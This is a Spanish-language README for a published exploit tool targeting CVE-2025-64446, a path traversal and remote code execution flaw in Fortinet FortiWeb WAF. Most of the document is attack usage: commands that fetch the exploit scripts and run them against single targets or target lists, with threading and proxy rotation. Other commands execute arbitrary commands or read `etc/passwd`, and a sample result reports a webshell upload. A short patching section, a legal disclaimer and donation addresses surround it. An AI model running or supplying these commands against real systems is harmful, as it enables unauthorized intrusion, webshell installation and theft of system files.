
Herramienta de investigación de seguridad para detectar y probar la CVE-2025-64446 (vulnerabilidad RCE de Salto de Ruta en FortiWeb)
Una herramienta de investigación de seguridad para detectar y probar la vulnerabilidad CVE-2025-64446 en el Firewall de Aplicaciones Web (WAF) Fortinet FortiWeb. Esta vulnerabilidad crítica de recorrido de ruta de día cero ha sido explotada activamente en la naturaleza y permite a atacantes no autenticados evitar los controles de seguridad y ejecutar código arbitrario.
Esta herramienta es solo para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. Utilice esta herramienta únicamente en sistemas de su propiedad o para los que tenga permiso explícito por escrito.
CVE-2025-64446 es una vulnerabilidad crítica de recorrido de ruta de día cero en Fortinet FortiWeb WAF que ha sido explotada activamente en la naturaleza. Esta vulnerabilidad permite a atacantes no autenticados evitar los controles de seguridad mediante ataques de recorrido de ruta, lo que podría llevar a la ejecución remota de código, acceso a archivos de configuración y compromiso total del sistema.
Puntuación CVSS: 9.8 (Crítica)
Estado: Explotado activamente en la naturaleza
CISA KEV: Agregado al catálogo de vulnerabilidades explotadas conocidas
Parche: FG-IR-25-910
Producto afectado: Fortinet FortiWeb WAF
# Clone the repository
git clone https://github.com/AN5I/cve-2025-64446-fortiweb-exploit.git
cd cve-2025-64446-fortiweb-exploit
# Install dependencies
pip install -r requirements.txt
# Make scripts executable (optional)
chmod +x cve_2025_64446_fortiweb_exploit.py
chmod +x cve_2025_64446_poc.py
# Download the scripts
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_fortiweb_exploit.py
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_poc.py
# Install dependencies
pip install requests
# Single target
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com
# Execute custom command
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -c "whoami"
# Multiple targets from file
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json
# With threading for faster scanning
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -t 5
# Verbose output for debugging
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -v
# Single proxy
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com --proxy http://proxy:port
# Multiple proxies from file
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt
# Basic POC test
python3 cve_2025_64446_poc.py -u http://target.com
# Test specific file
python3 cve_2025_64446_poc.py -u http://target.com -f etc/passwd
# Verbose output
python3 cve_2025_64446_poc.py -u http://target.com -v
-u, --url URL objetivo
-f, --file Archivo que contiene URLs objetivo (una por línea)
-c, --command Comando a ejecutar (por defecto: id)
-t, --threads Número de hilos (por defecto: 1)
-o, --output Archivo de salida (por defecto: uknf_fortiweb_results.json)
-v, --verbose Habilitar registro detallado
--proxy URL del proxy (ej., http://127.0.0.1:8080)
--proxy-list Archivo que contiene URLs de proxy (una por línea)
El script genera un archivo JSON con resultados detallados:
{
"target": "http://target.com",
"timestamp": "2025-11-21T00:25:40.123456",
"fortiweb_detected": true,
"vulnerable": true,
"path_traversal_successful": true,
"config_file_read": true,
"webshell_uploaded": true,
"command_executed": "id",
"output": "uid=1000(user) gid=1000(user)...",
"vulnerable_payload": "../../../../etc/passwd"
}
Si está utilizando FortiWeb WAF:
Aplique las actualizaciones de seguridad inmediatamente:
# Check current version
show system status
# Update to latest version
execute upgrade <firmware-file>
Segmentación de red:
Endurecimiento de configuración:
Requisitos de CISA:
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt
# Run scan
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com -c "uname -a"
# Single proxy
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com --proxy http://127.0.0.1:8080
# Multiple proxies from file
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt
# Basic POC
python3 cve_2025_64446_poc.py -u https://example.com
# Test specific file
python3 cve_2025_64446_poc.py -u https://example.com -f etc/passwd
¡Las contribuciones son bienvenidas! No dude en enviar una solicitud de extracción (Pull Request).
git checkout -b feature/CaracteristicaIncreible)git commit -m 'Añadir alguna CaracterísticaIncreible')git push origin feature/CaracteristicaIncreible)Si encuentra algún problema o tiene sugerencias, abra un issue en GitHub.
Este proyecto está licenciado bajo la Licencia MIT; consulte el archivo LICENSE para más detalles.
Si encuentra útil esta herramienta, ¡considere darle una estrella en GitHub!
Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. Los autores no son responsables del mal uso o daños causados por este programa. Los usuarios son responsables de asegurarse de tener la autorización adecuada antes de probar cualquier sistema.
Si encuentra útil esta herramienta y desea apoyar el proyecto:
Bitcoin (BTC):
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv
Ethereum (ETH):
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7
¡Gracias por tu apoyo! 🙏